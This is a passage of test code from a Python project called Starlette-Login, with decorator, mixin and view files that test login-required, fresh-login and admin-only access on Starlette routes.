return hmac.new(key, payload.encode('utf-8'), sha512).hexdigest()
```
#### File: Starlette-Login/tests/decorators.py
```python
import asyncio
import functools
import inspect
import typing
from starlette.exceptions import HTTPException
from starlette.requests import Request
from starlette.responses import Response
# Validate that the function received a Request instance argument
from starlette_login.decorator import is_route_function
from .model import User
def admin_only(func: typing.Callable) -> typing.Callable:
idx = is_route_function(func)
if asyncio.iscoroutinefunction(func):
@functools.wraps(func)
async def async_wrapper(
*args: typing.Any, **kwargs: typing.Any
) -> Response:
request = kwargs.get("request", args[idx] if args else None)
assert isinstance(request, Request)
user = request.scope.get('user')
if user and user.is_admin is not True:
raise HTTPException(status_code=403, detail='Forbidden access')
else:
return await func(*args, **kwargs)
return async_wrapper
else:
@functools.wraps(func)
def sync_wrapper(*args: typing.Any, **kwargs: typing.Any) -> Response:
request = kwargs.get("request", args[idx] if args else None)
assert isinstance(request, Request)
user = request.scope.get('user')
if user and user.is_admin is not True:
raise HTTPException(status_code=403, detail='Forbidden access')
else:
return func(*args, **kwargs)
return sync_wrapper
```
#### File: Starlette-Login/tests/test_decorator.py
```python
import pytest
@pytest.mark.asyncio
class TestLoginRequiredDecorator:
async def test_not_logged_in(self, test_client):
resp = test_client.get('/protected')
assert resp.status_code != 302
assert resp.headers.get('location') != '/'
async def test_logged_in(self, app, test_client):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get('/protected')
assert resp.status_code == 200
async def test_sync_page_not_logged_in(self, test_client):
resp = test_client.get('/sync_protected')
assert resp.status_code != 302
assert resp.headers.get('location') != '/'
async def test_sync_page_logged_in(self, app, test_client):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get('/sync_protected')
assert resp.status_code == 200
@pytest.mark.asyncio
class TestFreshLoginRequiredDecorator:
@pytest.mark.parametrize('path', ['/fresh', '/fresh_async'])
async def test_fresh_login(self, test_client, path):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get(path)
assert resp.status_code == 200
@pytest.mark.parametrize('path', ['/fresh', '/fresh_async'])
async def test_fresh_login_after_clean_session(
self, test_client, path
):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get(path)
assert resp.status_code == 200
# Set fresh session False
test_client.get('/un_fresh')
resp = test_client.get(path)
assert f'/login?next={path}' in resp.url
@pytest.mark.asyncio
class TestAdminOnlyDecorator:
async def test_regular_user(
self, test_client,
):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
path = '/admin_only'
resp = test_client.get(path)
assert resp.status_code == 403
async def test_regular_admin(
self, test_client,
):
test_client.post('/login', data={
'username': 'admin', 'password': 'password'
})
path = '/admin_only'
resp = test_client.get(path)
assert resp.status_code == 200
```
#### File: Starlette-Login/tests/test_mixins.py
```python
from starlette_login.mixins import UserMixin, AnonymousUser
class TestUserMixinTest:
def test_anonymous_user(self):
anon = AnonymousUser()
assert anon.is_authenticated is False
assert anon.display_name == ''
assert anon.identity is None
def test_user(self):
user = UserMixin()
assert user.is_authenticated is True
```
#### File: Starlette-Login/tests/views.py
```python
from urllib.parse import parse_qsl
from starlette.requests import Request
from starlette.responses import (
HTMLResponse, RedirectResponse, PlainTextResponse, JSONResponse
)
from starlette_login.decorator import login_required, fresh_login_required
from starlette_login.utils import login_user, logout_user
from .decorators import admin_only
from .extension import login_manager
from .model import user_list
HOME_PAGE = "You are logged in as {{ user.username }}"
LOGIN_PAGE = """
<h4>{error}<h4>
<form method="POST">
<label>username <input name="username"></label>
<label>Password <input name="password" type="password"></label>
<button type="submit">Login</button>
</form>
"""
async def login_page(request: Request):
error = ''
if request.method == 'POST':
body = (await request.body()).decode()
data = dict(parse_qsl(body))
user = user_list.get_by_username(data['username'])
if not user:
error = 'Invalid username'
elif user.check_password(data['password']) is False:
error = 'Invalid password'
else:
await login_user(request, user, bool(data.get('remember')))
return RedirectResponse('/', 302)
return HTMLResponse(LOGIN_PAGE.format(error=error))
async def logout_page(request: Request):
if request.user.is_authenticated:
content = 'Logged out'
await logout_user(request)
else:
content = 'You not logged in'
return PlainTextResponse(content)
async def home_page(request: Request):
if request.user.is_authenticated:
content = f'You are logged in as {request.user.username}'
else:
content = 'You are not logged in'
return PlainTextResponse(content=content)
@login_required
async def protected_page(request: Request):
if getattr(request, 'user') is not None:
username = request.user.username
else:
username = None
return PlainTextResponse(f'You are logged in as {username}')
@login_required
def sync_protected_page(request: Request):
return PlainTextResponse(
f'You are logged in as {request.user.username}'
)
@login_required
def get_request_data(request: Request):
return JSONResponse({
'user': request.user.__dict__,
'session': request.session,
'cookie': request.cookies
})
@fresh_login_required
def sync_fresh_login(request: Request):
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
@fresh_login_required
async def async_fresh_login(request: Request):
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
@login_required
@admin_only
async def admin_only_page(request: Request):
return PlainTextResponse('You are an admin')
def un_fresh_login(request: Request):
session_fresh = login_manager.config.SESSION_NAME_FRESH
request.session[session_fresh] = False
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
def clear_session(request: Request):
for key in login_manager.config.session_keys:
if key == login_manager.config.REMEMBER_COOKIE_NAME:
continue
try:
request.session.pop(key)
except KeyError:
pass
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
async def excluded(request: Request):
try:
user = request.user
except AssertionError:
# Ignore starlette(`AuthenticationMiddleware`) exception
user = None
return JSONResponse({
'user': getattr(user, 'username', None)
})
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.